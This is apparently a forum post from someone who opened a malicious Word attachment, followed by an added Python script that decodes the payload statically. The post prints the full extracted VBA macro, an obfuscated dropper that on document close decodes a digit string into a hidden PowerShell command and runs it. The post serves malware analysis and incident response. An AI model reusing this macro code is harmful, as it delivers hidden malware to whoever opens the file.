
Received a Word document by email with malware. Can someone help me analyze this?

I received a Word document by email. It appeared to come from a known sender as part of a message chain that had actually occurred (i.e. the text content was legitimate).

People faking senders, I catch all the time. Having the correct content threw me off and I opened the Word document. Upon closing the document, my firewall told me that PowerShell was requesting internet access - which I denied, as I recognized what was going on. I deleted my temp folder contents and immediately ran a virus scan - but this isn't going to be caught.

I went back into the Word document - sandboxed, this time - and I extracted the macros. I believe it creates an executable - or at least, an executable script, and then runs it.

I need help determining what the final script is so that I can see what damage was done and whether there's anything left on my machine.

Malware Word Macros:


' Lookup table: returns the character stored at index scivolo.
Public Function scala(ByVal scivolo As Integer) As String
    calcolo = Array("c", "a", ".", "+", "z", "/", "r", "h", "n", "\", "(", "P", "b", "k", "g", "p", "j", ":", "x", ")", "D", "i", "f", " ", "v", "B", "d", "$", "t", "S", "W", "w", "F", ";", "m", "=", "l", "E", "T", "y", "-", "G", "?", "C", "O", "o", "e", "'", "N", "A", "q", "s", ",")
    Dim sino As Integer
    For sino = LBound(calcolo) To UBound(calcolo)
        If sino = scivolo Then
            scala = calcolo(sino)
        End If
    Next
End Function

' Runs the decoded command line in a hidden window (vbHide * 4 evaluates to 0).
Public Function dinamico(valgo As String)
    If Len(valgo) < 4774 Then
        CreateObject("WScript.Shell").Run valgo, vbHide * 4
    End If
End Function

' Fires when the document is closed: decodes the digit string and runs the result.
Sub Document_Close()
    feralo = bordo("15453146065107463636234048453718212823403718460023253915015151234043453434010826231048463140441216460028232939512846340248462802304612433621460828190220453108364501263221364610470728281517050526452116502250080731465031461501150145510200453405292905280108135116023604344752232746082417491111204938492303234709042232410246184647193323292801062840110645004651512327460824174911112049384947090422324102461846473323104846314044121646002823293951284634024846280230461243362146082819022045310836450126292806210814104707282815170505264521165022500807314650314615011501455102004534055102150715422126352801081351164719")
    Application.Run "dinamico", feralo
End Sub

' Concatenates its two arguments.
Function pirolisi(ByVal foro, ByVal baco) As String
    valletta = LTrim(vbNullString) & vbNullString
    roba = Array(foro, baco)
    For peso = 0 To UBound(roba)
        valletta = valletta + vbNullString + roba(peso) + vbNullString
    Next
    pirolisi = valletta
End Function

' Decoder: reads the digits two at a time and maps each pair through scala().
Function bordo(Optional dozzina As String, Optional dozzina2)
    aspirato = minerale(dozzina)
    brindare = Trim(vbNullString) & vbNullString
    For sino = 0 To Len(dozzina)
        If (sino + 1) <= UBound(aspirato) Then
            fiore = aspirato(sino + 1)
            sfarzoso = aspirato(sino)
            voragine = Int(sfarzoso + fiore)
            mucosa = scala(voragine)
            brindare = pirolisi(brindare, mucosa)
            sino = sino + 1
        End If
    Next
    bordo = brindare
End Function

' Splits a string into an array of single characters.
Function minerale(onere As String, Optional asettico As Integer) As Variant
    minerale = Split(Left(StrConv(onere, vbUnicode), Len(StrConv(onere, vbUnicode)) - 1), vbNullChar)
End Function

---

I would be very grateful if someone could give me a hand with this.



Submitted November 29, 2017 at 08:07PM by PurloinedSentience http://ift.tt/2AGUc9D
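
An added example, not part of the original post: a static decoder for the macro above, so the command line can be recovered without opening the document or running the macro. It assumes `bordo()` reads the digit string as two-digit indexes into the `scala()` table; `decode`, `indicators` and `SAMPLE_PREFIX` are names introduced here, and `SAMPLE_PREFIX` is only the first 20 digits of the posted string.

```python
import re

# Lookup table copied from scala() in the posted macro (indexes 0-52).
TABLE = ["c", "a", ".", "+", "z", "/", "r", "h", "n", "\\", "(", "P", "b", "k",
         "g", "p", "j", ":", "x", ")", "D", "i", "f", " ", "v", "B", "d", "$",
         "t", "S", "W", "w", "F", ";", "m", "=", "l", "E", "T", "y", "-", "G",
         "?", "C", "O", "o", "e", "'", "N", "A", "q", "s", ","]

# First 20 digits of the string that Document_Close passes to bordo().
SAMPLE_PREFIX = "15453146065107463636"


def decode(digits, table=TABLE):
    """Statically reproduce bordo(): each two-digit pair indexes the table."""
    digits = "".join(digits.split())  # tolerate line wraps from copy/paste
    if not re.fullmatch(r"[0-9]*", digits):
        raise ValueError("encoded string must contain only decimal digits")
    if len(digits) % 2:
        # bordo() skips a trailing unpaired digit; do the same.
        digits = digits[:-1]
    out = []
    for i in range(0, len(digits), 2):
        idx = int(digits[i:i + 2])
        # scala() returns an empty string when the index is out of range.
        out.append(table[idx] if idx < len(table) else "")
    return "".join(out)


def indicators(command):
    """Return defanged URLs found in a decoded command, safe to paste in notes."""
    urls = re.findall(r"https?://[^\s'\"();,]+", command)
    return [u.replace("http", "hxxp", 1).replace(".", "[.]") for u in urls]


if __name__ == "__main__":
    print(decode(SAMPLE_PREFIX))
```

Passing the full digit string from `Document_Close` to `decode()` yields the command that `dinamico()` would have handed to `WScript.Shell`; `indicators()` lists any URLs in it in defanged form for checking against firewall and proxy logs.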
